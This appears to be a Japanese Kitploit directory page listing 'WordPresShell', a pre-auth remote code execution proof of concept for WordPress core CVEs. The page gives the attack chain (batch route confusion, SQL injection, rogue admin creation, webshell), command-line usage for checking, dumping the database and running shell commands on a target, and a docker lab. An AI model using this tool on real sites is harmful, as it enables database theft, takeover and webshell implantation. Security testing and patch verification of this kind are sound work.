Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/securelayer7/wordpresshell
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubsecurelayer7/wordpresshell

WordPresShell

CVE-2026-63030 / CVE-2026-60137 (WordPress コア) の Pre-auth RCE PoC

リポジトリを見る
911ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPresShell

CVE-2026-63030 および CVE-2026-60137 (WordPress コア) に対する事前認証 RCE PoC。 REST /batch/v1 ルート混乱 → WP_Query author__not_in SQLi → 未認証管理者作成 → Webシェル。単一ファイル、Python stdlib のみ。

脆弱性発見: Adam Kues (Searchlight Cyber)。影響を受けるバージョン: 6.9.0–6.9.4, 7.0.0–7.0.1。修正済み: 6.9.5 / 7.0.2。

使用法

root@kitploit:~
python3 WordPresShell.py check http://target                      # 確認 (非破壊的)
python3 WordPresShell.py dump  http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id"           # クラック不要の RCE
python3 WordPresShell.py shell http://target -i                   # インタラクティブ
python3 WordPresShell.py shell http://target --user U --password P --cmd id

ラボ

root@kitploit:~
docker compose up -d          # WordPress 7.0.1 on :8092
docker compose down -v        # 破棄

shell は管理者を作成し、Webシェルを配置します — テスト後は両方を削除してください。許可されたテストのみ行ってください。

ツールをダウンロード